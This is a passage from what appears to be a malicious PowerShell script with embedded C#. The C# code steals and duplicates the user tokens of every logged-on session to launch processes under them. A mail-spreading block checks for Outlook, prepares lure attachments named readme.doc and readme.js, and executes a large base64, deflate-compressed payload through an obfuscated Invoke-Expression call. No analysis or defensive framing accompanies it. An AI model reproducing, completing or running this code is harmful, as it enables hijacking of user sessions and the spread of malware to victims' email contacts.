for (int i = 0; i < sessionCount; i++)
{
WTS_SESSION_INFO si = (WTS_SESSION_INFO)Marshal.PtrToStructure((IntPtr)(current), typeof(WTS_SESSION_INFO));
current += arrayElementSize;
Console.WriteLine("Get Session ID:"+si.SessionID);
if (WTSQueryUserToken(si.SessionID, ref hImpersonationToken))
{
Console.WriteLine("Get Session Token Success");
if (DuplicateTokenEx(hImpersonationToken, 0, IntPtr.Zero, 2, 1, ref phUserToken))
{
Console.WriteLine("Duplicate Token Success");
StartProcessWithToken(ref phUserToken,cmd);
}
}
}
}
}
}
}
"@
Add-Type -TypeDefinition $msource
$mail_code=@'
if((get-childitem C:\Users\$env:username\AppData\Local\Microsoft\Outlook).count -gt 1){
$base_url="CORE_URL"
$att_doc=$env:tmp+"\readme.doc"
$att_js=$env:tmp+"\readme.js"
IE`x $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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